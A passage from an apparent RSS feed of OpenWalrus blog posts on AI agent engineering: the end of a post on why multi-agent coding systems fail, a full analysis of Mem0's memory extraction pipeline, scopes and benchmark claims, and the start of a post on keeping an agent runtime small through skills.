&lt;p&gt;The failure mode compounds. From &lt;a href="https://towardsdatascience.com/why-your-multi-agent-system-is-failing-escaping-the-17x-error-trap-of-the-bag-of-agents/" rel="noopener noreferrer"&gt;Towards Data Science&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"When one agent decides something incorrectly, downstream agents assume it's true,&lt;br&gt;
and by discovery time, 10 downstream decisions are built on that error."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This is why Devin avoids parallel agents entirely. It's not a capability limitation —&lt;br&gt;
it's an architectural choice based on the failure modes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cost and latency explode
&lt;/h2&gt;

&lt;p&gt;Multi-agent token consumption doesn't scale linearly. The GitHub Blog documents the&lt;br&gt;
production gap:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;3-agent workflows that cost $5–50 in demos reach &lt;strong&gt;$18,000–90,000/month at scale&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Response times jump from 1–3 seconds to 10–40 seconds per request&lt;/li&gt;
&lt;li&gt;Reliability drops from 95–98% in pilots to 80–87% under production load&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The underlying cause: every inter-agent handoff requires token-intensive context reconstruction.&lt;br&gt;
The parent encodes its state into a prompt; the subagent re-processes the entire relevant context&lt;br&gt;
from scratch. Multiplied across many agents and many calls, the token budget explodes.&lt;/p&gt;

&lt;p&gt;Cursor's background agents add a different dimension: cloud environment reliability.&lt;br&gt;
User-reported failures include Docker builds failing during &lt;code&gt;apt-get update&lt;/code&gt;, git branch&lt;br&gt;
push failures, connection dropouts that stall agents mid-task, and cloud environment&lt;br&gt;
initialization errors. The compute is remote and shared, so failures that don't exist&lt;br&gt;
locally appear at scale.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where each system struggles
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The chart reflects the research above. Claude Code is strong on environment reliability&lt;br&gt;
(local execution) but has no mechanism for context continuity or parallel conflict handling.&lt;br&gt;
Cursor partially addresses parallelism through Git worktrees but has the opposite reliability&lt;br&gt;
profile — cloud execution introduces environment failures. Devin avoids parallel agents&lt;br&gt;
entirely and invests heavily in error recovery through its review agent, which is why&lt;br&gt;
it scores high on those axes but zero on parallel conflict handling.&lt;/p&gt;

&lt;p&gt;No system in the current survey scores well across all five dimensions. Context continuity&lt;br&gt;
is the universal weak spot.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why better models don't fix this
&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://composio.dev/blog/why-ai-agent-pilots-fail-2026-integration-roadmap" rel="noopener noreferrer"&gt;2026 AI Agent Report&lt;/a&gt;&lt;br&gt;
is direct:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Most multi-agent failures aren't caused by weak models — they're caused by weak&lt;br&gt;
reasoning architecture. Orchestrating multiple agents with divergent goals, conflicting&lt;br&gt;
information, and cascading failures requires architectural discipline."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Code quality compounds the issue. A January 2026 &lt;a href="https://stackoverflow.blog/2026/01/28/are-bugs-and-incidents-inevitable-with-ai-coding-agents/" rel="noopener noreferrer"&gt;Stack Overflow Blog analysis&lt;/a&gt;&lt;br&gt;
found that AI-generated code includes bugs at 1.5–2x the rate of human-written code when&lt;br&gt;
supervision gaps exist, with 3x the readability issues. Multi-agent workflows create&lt;br&gt;
supervision gaps by design — no single reviewer sees the whole picture.&lt;/p&gt;

&lt;p&gt;The integration layer is where failures originate: how agents hand off state, coordinate&lt;br&gt;
writes, report progress, and signal when they're stuck. Models are getting better;&lt;br&gt;
orchestration architecture largely isn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the research says works
&lt;/h2&gt;

&lt;p&gt;The GitHub Blog identifies several patterns that prevent the most common failures:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Typed schemas for inter-agent messages.&lt;/strong&gt; Without explicit contracts between agents,&lt;br&gt;
every handoff is a natural language interpretation problem. Typed schemas eliminate a&lt;br&gt;
class of coordination errors before they happen.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Explicit handoff contracts.&lt;/strong&gt; The orchestrator maintains state; workers are stateless&lt;br&gt;
and only know what the orchestrator tells them per-invocation. This is the "Main Agent&lt;br&gt;
as Project Manager" pattern formalized. It's more overhead to design but dramatically&lt;br&gt;
reduces inter-agent confusion.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Budget meters and permission gates.&lt;/strong&gt; Catching runaway token consumption before it&lt;br&gt;
becomes a $90,000 surprise requires active monitoring. Permission gates before&lt;br&gt;
destructive or expensive operations give the system a chance to pause.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Observable task state.&lt;/strong&gt; When agents can report their current status to a shared&lt;br&gt;
registry — not just to their own context — the orchestrator and user can see what's&lt;br&gt;
happening and intervene. This is the problem the&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/agent-task-registry" rel="noopener noreferrer"&gt;task registry design&lt;/a&gt; addresses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Checkpointing over re-discovery.&lt;/strong&gt; Explicit handoff documents (a structured summary&lt;br&gt;
of what's been done, what constraints apply, what decisions have been made) reduce&lt;br&gt;
context amnesia. The cost of writing a handoff document is cheaper than the cost of&lt;br&gt;
a subagent re-exploring the same territory.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://cognition.ai/blog/dont-build-multi-agents" rel="noopener noreferrer"&gt;Don't Build Multi-Agents&lt;/a&gt;
— Cognition's case for single-agent architecture&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.blog/ai-and-ml/generative-ai/multi-agent-workflows-often-fail-heres-how-to-engineer-ones-that-dont/" rel="noopener noreferrer"&gt;Multi-agent workflows often fail. Here's how to engineer ones that don't.&lt;/a&gt;
— GitHub Blog's structural analysis&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://towardsdatascience.com/why-your-multi-agent-system-is-failing-escaping-the-17x-error-trap-of-the-bag-of-agents/" rel="noopener noreferrer"&gt;Why Your Multi-Agent System is Failing: Escaping the 17x Error Trap&lt;/a&gt;
— cascading decision error analysis&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://medium.com/@ilyas.ibrahim/how-i-made-claude-code-agents-coordinate-100-and-solved-context-amnesia-5938890ea825" rel="noopener noreferrer"&gt;How I Solved Context Amnesia in Claude Code&lt;/a&gt;
— community workaround for context continuity&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/agent-task-registry" rel="noopener noreferrer"&gt;Seeing what your agents are doing: the task registry problem&lt;/a&gt;
— how walrus addresses observable task state&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;Plans vs tasks: how AI agents think before they act&lt;/a&gt;
— the planning side of multi-agent coordination&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/multi-agent-coordination" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Mem0: what three memory scopes actually cost</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:52:16 +0000</pubDate>
      <link>https://forem.com/crabtalk/mem0-what-three-memory-scopes-actually-cost-1kpc</link>
      <guid>https://forem.com/crabtalk/mem0-what-three-memory-scopes-actually-cost-1kpc</guid>
      <description>&lt;p&gt;Every agent memory system eventually faces the same question: when should the agent forget? &lt;a href="https://github.com/mem0ai/mem0" rel="noopener noreferrer"&gt;Mem0&lt;/a&gt;'s answer is to never let it come to that — an LLM-powered extraction pipeline watches every conversation, pulls out candidate memories, deduplicates them against a vector store, and asks a second LLM to decide whether each one should be added, updated, deleted, or ignored. It's the most sophisticated memory management pipeline we've examined. It's also the most expensive.&lt;/p&gt;

&lt;p&gt;We dug into how Mem0 actually works: the extraction pipeline, the three memory scopes, the benchmark claims, and the infrastructure required to run it. Here's what we found.&lt;/p&gt;

&lt;h2&gt;
  
  
  The extraction pipeline
&lt;/h2&gt;

&lt;p&gt;Most agent memory systems store what the agent explicitly asks to store. Mem0 takes a different approach: it watches every conversation and automatically extracts memories the agent never asked for.&lt;/p&gt;

&lt;h3&gt;
  
  
  How memories get created
&lt;/h3&gt;

&lt;p&gt;Three inputs feed the extraction pipeline:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Latest exchange&lt;/strong&gt; — the most recent user message and agent response&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rolling summary&lt;/strong&gt; — a compressed summary of recent conversation context&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Recent messages&lt;/strong&gt; — the last &lt;em&gt;m&lt;/em&gt; messages for continuity&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;An LLM processes these inputs and extracts candidate memories — concise facts, not full text. "User prefers TypeScript" rather than the full conversation where they mentioned it.&lt;/p&gt;

&lt;h3&gt;
  
  
  The four-way LLM decision
&lt;/h3&gt;

&lt;p&gt;For each candidate memory, a second LLM call runs:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Vector similarity search&lt;/strong&gt; retrieves existing memories similar to the candidate&lt;/li&gt;
&lt;li&gt;The LLM sees the candidate and its nearest neighbors and decides one of four actions:

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ADD&lt;/strong&gt; — genuinely new information, store it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UPDATE&lt;/strong&gt; — augment an existing memory with more recent or detailed info&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DELETE&lt;/strong&gt; — the new information contradicts an existing memory, remove the old one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NOOP&lt;/strong&gt; — the fact already exists or is irrelevant, skip it&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is where the cost lives. Every memory write requires two LLM calls (extract + decide), plus a vector similarity search. Over a 100-turn conversation, that's 200+ LLM calls just for memory management.&lt;/p&gt;

&lt;h3&gt;
  
  
  Graph-based conflict resolution
&lt;/h3&gt;

&lt;p&gt;Mem0's graph variant (Mem0ᵍ) adds a layer on top: a Conflict Detector that flags overlapping or contradictory nodes and edges, and an Update Resolver that determines merges, invalidations, or skips. This supports temporal reasoning — marking relationships as obsolete without deleting them.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The pipeline is technically impressive. The question is whether the overhead is worth it for most agent use cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three memory scopes
&lt;/h2&gt;

&lt;p&gt;Mem0 organizes memory into three scopes that map to different temporal horizons.&lt;/p&gt;

&lt;h3&gt;
  
  
  Conversation memory (short-term)
&lt;/h3&gt;

&lt;p&gt;In-flight messages within a single turn. What was just said. This is what every agent framework has — the context window itself.&lt;/p&gt;

&lt;h3&gt;
  
  
  Session memory
&lt;/h3&gt;

&lt;p&gt;Short-lived context within a single task or channel. Tool outputs, intermediate calculations, what the agent is currently focused on. Dies when the session ends.&lt;/p&gt;

&lt;h3&gt;
  
  
  User memory (long-term)
&lt;/h3&gt;

&lt;p&gt;Persists across all conversations with a specific user. This is the most interesting scope — it contains:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Factual memory&lt;/strong&gt;: preferences, account details, domain knowledge&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Episodic memory&lt;/strong&gt;: summaries of past interactions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Semantic memory&lt;/strong&gt;: relationships between concepts for reasoning&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The system stores each scope separately and merges them during query. The search pipeline pulls from all scopes, ranking user memories first, then session notes, then raw history.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scope assignment problem&lt;/strong&gt;: when the extraction pipeline identifies a new memory, which scope does it belong to? "User prefers TypeScript" is clearly user-scoped. "The current deployment is failing" is session-scoped. But "user is working on a migration to Rust" sits in a gray zone — it's user-level context, but it's temporary. Misclassification in either direction causes problems: user-scoped memories that should be session-scoped pollute all future sessions; session-scoped memories that should be user-scoped disappear when the session ends.&lt;/p&gt;

&lt;h2&gt;
  
  
  The benchmark claims
&lt;/h2&gt;

&lt;p&gt;Mem0's &lt;a href="https://arxiv.org/abs/2504.19413" rel="noopener noreferrer"&gt;research paper&lt;/a&gt; (Chhikara et al., April 2025) reports strong numbers.&lt;/p&gt;

&lt;h3&gt;
  
  
  LOCOMO results
&lt;/h3&gt;

&lt;p&gt;On the LOCOMO (Long Conversation Memory) benchmark, Mem0 scores 66.9% on an LLM-as-Judge evaluation, compared to 52.9% for OpenAI's memory. The graph variant (Mem0ᵍ) adds roughly 2% on top.&lt;/p&gt;

&lt;h3&gt;
  
  
  Token savings and latency
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Mem0 claim&lt;/th&gt;
&lt;th&gt;Baseline&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Token savings&lt;/td&gt;
&lt;td&gt;90% reduction&lt;/td&gt;
&lt;td&gt;Full-context (26K → 1.8K tokens)&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Latency (P95)&lt;/td&gt;
&lt;td&gt;91% reduction&lt;/td&gt;
&lt;td&gt;Full-context (17.12s → 1.44s)&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Accuracy&lt;/td&gt;
&lt;td&gt;26% relative improvement&lt;/td&gt;
&lt;td&gt;LLM-as-Judge vs OpenAI memory&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LOCOMO F1&lt;/td&gt;
&lt;td&gt;66.9%&lt;/td&gt;
&lt;td&gt;LongMemEval benchmark&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What the paper actually measures
&lt;/h3&gt;

&lt;p&gt;The 90% token savings compares selective memory retrieval (pull only relevant memories) against stuffing the full conversation history into the context window. This is a real comparison, but the baseline is generous — few production systems stuff raw history without any summarization. Against a properly compacted conversation, the savings would be smaller.&lt;/p&gt;

&lt;p&gt;The paper doesn't report the total cost including the extraction pipeline itself. The 90% savings is on the retrieval side only. If the extraction pipeline adds 200 LLM calls over a 100-turn conversation, the total cost equation changes significantly.&lt;/p&gt;

&lt;p&gt;The practical deployments the paper cites (RevisionDojo, OpenNote) report 40% token reduction — a more realistic figure that likely includes extraction overhead.&lt;/p&gt;

&lt;h2&gt;
  
  
  Infrastructure requirements
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Self-hosted stack
&lt;/h3&gt;

&lt;p&gt;Running Mem0 yourself requires:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Docker &amp;amp; Docker Compose v2&lt;/strong&gt; — orchestration layer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL + pgvector&lt;/strong&gt; — vector storage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Neo4j&lt;/strong&gt; — graph database for relationship memory&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI API key&lt;/strong&gt; — default LLM and embedding model (swappable for Ollama for fully local inference)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;That's four external services before you store a single memory. The documentation estimates 2-5 minutes for initial setup, but production deployment (persistence volumes, auth, CORS, monitoring) is significantly more involved. The default configuration has no authentication or CORS restrictions — the docs explicitly warn about needing a reverse proxy before network exposure.&lt;/p&gt;

&lt;h3&gt;
  
  
  Managed service
&lt;/h3&gt;

&lt;p&gt;Mem0's managed service at app.mem0.ai reduces this to a single API key. SOC 2 compliant, with audit logs and workspace governance. This is where the infrastructure complexity disappears — but the LLM extraction cost remains.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Mem0&lt;/th&gt;
&lt;th&gt;Walrus&lt;/th&gt;
&lt;th&gt;Graphiti (Zep)&lt;/th&gt;
&lt;th&gt;Claude Code&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Memory scopes&lt;/td&gt;
&lt;td&gt;3 (conversation, session, user)&lt;/td&gt;
&lt;td&gt;1 (unified graph)&lt;/td&gt;
&lt;td&gt;1 (temporal KG)&lt;/td&gt;
&lt;td&gt;1 (files on disk)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Storage backend&lt;/td&gt;
&lt;td&gt;24+ vector stores + Neo4j&lt;/td&gt;
&lt;td&gt;LanceDB + lance-graph&lt;/td&gt;
&lt;td&gt;Neo4j&lt;/td&gt;
&lt;td&gt;Markdown files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Extraction&lt;/td&gt;
&lt;td&gt;LLM pipeline (extract + decide)&lt;/td&gt;
&lt;td&gt;Agent tools (remember/recall)&lt;/td&gt;
&lt;td&gt;LLM + temporal edges&lt;/td&gt;
&lt;td&gt;Manual / auto-memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Conflict resolution&lt;/td&gt;
&lt;td&gt;Graph Conflict Detector + Update Resolver&lt;/td&gt;
&lt;td&gt;Upsert (last write wins)&lt;/td&gt;
&lt;td&gt;Bi-temporal invalidation&lt;/td&gt;
&lt;td&gt;Manual edit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;External dependencies&lt;/td&gt;
&lt;td&gt;PostgreSQL, Neo4j, vector DB, OpenAI&lt;/td&gt;
&lt;td&gt;None (embedded)&lt;/td&gt;
&lt;td&gt;Neo4j server&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM calls per write&lt;/td&gt;
&lt;td&gt;2 (extract + decide)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;1 (extraction)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment&lt;/td&gt;
&lt;td&gt;Docker Compose or managed cloud&lt;/td&gt;
&lt;td&gt;Single binary&lt;/td&gt;
&lt;td&gt;Docker + Neo4j&lt;/td&gt;
&lt;td&gt;CLI / IDE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;License&lt;/td&gt;
&lt;td&gt;Apache 2.0&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;



&lt;p&gt;The radar shows the core tradeoff: Mem0 dominates on deduplication and conflict resolution. Walrus dominates on setup simplicity and schema flexibility. Neither wins everywhere — they're optimizing for different constraints.&lt;/p&gt;

&lt;h2&gt;
  
  
  What walrus does differently
&lt;/h2&gt;

&lt;p&gt;Walrus bets on a single memory layer: LanceDB + lance-graph with three tables (entities, relations, journals) and six tools (remember, recall, relate, connections, compact, distill). No extraction pipeline, no scope disambiguation, no LLM calls per write.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The write path tells the story. Mem0 adds four steps between "something worth remembering happened" and "memory stored." Walrus has one: the agent calls &lt;code&gt;remember&lt;/code&gt; and the fact goes into the graph.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where this works&lt;/strong&gt;: for agents that run tens to hundreds of sessions, the agent itself can manage deduplication through careful key naming and &lt;code&gt;recall&lt;/code&gt; before &lt;code&gt;remember&lt;/code&gt;. The LLM is already reasoning about the conversation — asking it to also decide what's worth storing is a smaller cognitive burden than running a separate extraction pipeline.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where this breaks&lt;/strong&gt;: at thousands of sessions with the same user, manual deduplication stops scaling. If the agent uses different keys for the same concept across sessions, duplicates accumulate. Mem0's similarity-threshold deduplication (0.85 cosine similarity triggers a semantic merge) catches these automatically. Walrus doesn't — yet.&lt;/p&gt;

&lt;p&gt;We explored these memory architecture tradeoffs across five products in &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;persistent agent memory research&lt;/a&gt;. Hermes Agent takes yet another approach with &lt;a href="https://openwalrus.xyz/blog/hermes-agent-survey" rel="noopener noreferrer"&gt;five memory layers&lt;/a&gt; — procedural skills, user modeling via Honcho, and FTS5 for cross-session recall. The &lt;a href="https://openwalrus.xyz/blog/context-compaction" rel="noopener noreferrer"&gt;context compaction survey&lt;/a&gt; covers how frameworks handle the overflow problem that drives memory systems in the first place.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does the extraction pipeline pay for itself?&lt;/strong&gt; Mem0 makes 2 LLM calls per memory write. At GPT-4o pricing, a 100-turn conversation costs roughly $0.30–0.80 just in memory management. The 90% token savings on retrieval are real — but do they offset the extraction cost? The paper reports savings on the retrieval side only, not total cost including extraction.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What happens when the conflict resolver gets it wrong?&lt;/strong&gt; The graph-based Conflict Detector + Update Resolver is LLM-powered, which means probabilistic. If it incorrectly marks "prefers async/await in TypeScript" as conflicting with "prefers callbacks in Python" (different languages, different contexts), the user loses a valid memory. The paper reports aggregate accuracy but not conflict resolution precision.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Do most agents need three memory scopes?&lt;/strong&gt; Conversation, session, and user memory is a clean taxonomy. But scope assignment is itself an LLM decision — misclassification creates problems in both directions. For many agent use cases (coding assistants, chatbots, task automation), a single-layer approach with explicit agent control may be simpler and sufficient.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Can a single-layer approach match Mem0 at scale?&lt;/strong&gt; At 10,000 memories across 500 sessions, deduplication isn't optional — it's survival. Does walrus need to add dedup at the storage layer, or can smarter &lt;code&gt;recall&lt;/code&gt; + &lt;code&gt;remember&lt;/code&gt; patterns handle it?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Is the managed service the real product?&lt;/strong&gt; Self-hosted Mem0 requires Docker + PostgreSQL + Neo4j + OpenAI. The managed service requires an API key. The complexity gap between the two is enormous. The open-source version may be more lead generator than standalone product — a pattern increasingly common in AI infrastructure.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2504.19413" rel="noopener noreferrer"&gt;Mem0 research paper&lt;/a&gt; — Chhikara et al., "Building Production-Ready AI Agents with Scalable Long-Term Memory" (April 2025)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/mem0ai/mem0" rel="noopener noreferrer"&gt;Mem0 GitHub&lt;/a&gt; — Apache 2.0, 41K+ stars&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.mem0.ai/" rel="noopener noreferrer"&gt;Mem0 documentation&lt;/a&gt; — architecture overview, API reference, self-hosting guide&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.mem0.ai/open-source/features/graph-memory" rel="noopener noreferrer"&gt;Graph memory docs&lt;/a&gt; — Mem0ᵍ variant with Neo4j/Memgraph&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2306.07174" rel="noopener noreferrer"&gt;LOCOMO benchmark&lt;/a&gt; — Long Conversation Memory evaluation framework&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/getzep/graphiti" rel="noopener noreferrer"&gt;Graphiti (Zep)&lt;/a&gt; — temporal knowledge graph alternative&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Less code, more skills</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:51:33 +0000</pubDate>
      <link>https://forem.com/crabtalk/less-code-more-skills-2kf5</link>
      <guid>https://forem.com/crabtalk/less-code-more-skills-2kf5</guid>
      <description>&lt;p&gt;OpenWalrus is a single binary. No Docker, no microservices, no plugin&lt;br&gt;
runtime with a package manager. One &lt;code&gt;cargo install&lt;/code&gt;, one process, and&lt;br&gt;
you have a fully autonomous AI agent runtime on your machine.&lt;/p&gt;

&lt;p&gt;Keeping it that way while scaling to every possible use case is the&lt;br&gt;
central design tension of the project. And it's the same tension every&lt;br&gt;
agent framework faces: &lt;strong&gt;how do you stay small without becoming limited?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Our answer is a design principle we keep coming back to: &lt;strong&gt;less code,&lt;br&gt;
more skills.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The framework bloat trap
&lt;/h2&gt;

&lt;p&gt;Agent frameworks grow fast. A team ships a coding agent. Users ask for&lt;br&gt;
web browsing, so they add a browser tool. Users ask for memory, so they&lt;br&gt;
add a memory subsystem. Users ask for RAG, so they bundle an embedding&lt;br&gt;
model. Users ask for customization, so they add configuration layers —&lt;br&gt;
CLAUDE.md, .cursorrules, AGENTS.md, TOOLS.md, MEMORY.md, memory banks,&lt;br&gt;
auto-generated observations, reflections, compressed histories.&lt;/p&gt;

&lt;p&gt;Every feature request answered with framework code makes the repo bigger,&lt;br&gt;
the binary heavier, the surface area wider, and the maintenance burden&lt;br&gt;
steeper. Eventually the framework is doing so much that it becomes the&lt;br&gt;
bottleneck — slow to build, hard to debug, impossible to audit.&lt;/p&gt;

&lt;p&gt;The system prompt suffers the same inflation. &lt;a href="https://arxiv.org/abs/2507.11538" rel="noopener noreferrer"&gt;Research shows&lt;/a&gt; frontier LLMs&lt;br&gt;
reliably follow around 150-200 instructions. Past that, adherence degrades&lt;br&gt;
— sometimes exponentially for smaller models. Every feature that injects&lt;br&gt;
more context into the prompt makes the agent worse at everything else.&lt;/p&gt;

&lt;p&gt;We've watched this happen. We hit the ceiling ourselves. And we stopped&lt;br&gt;
pushing through it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The principle: small core, open surface
&lt;/h2&gt;

&lt;p&gt;The walrus repo should stay compact. Not because we're lazy, but because&lt;br&gt;
a compact core is a correct core — easier to audit, easier to trust,&lt;br&gt;
easier to run on constrained hardware.&lt;/p&gt;

&lt;p&gt;But a compact core only works if the surface area for extension is wide&lt;br&gt;
open. This is where skills come in.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The core&lt;/strong&gt; handles what only the core can handle: LLM inference, agent&lt;br&gt;
lifecycle, tool dispatch, and a&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;graph memory layer&lt;/a&gt; backed by&lt;br&gt;
&lt;a href="https://lancedb.com/" rel="noopener noreferrer"&gt;LanceDB&lt;/a&gt; + &lt;a href="https://github.com/lance-format/lance-graph" rel="noopener noreferrer"&gt;lance-graph&lt;/a&gt;.&lt;br&gt;
Both are embedded, Rust-native, and compile into the walrus binary — no&lt;br&gt;
separate database server, no Docker. This is the code we maintain.&lt;br&gt;
It should be small, correct, and boring.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Skills and MCP servers&lt;/strong&gt; handle everything else. A skill is a behavioral&lt;br&gt;
template — instructions and patterns that tell an agent how to approach a&lt;br&gt;
domain, including which entity types and relationships to extract from&lt;br&gt;
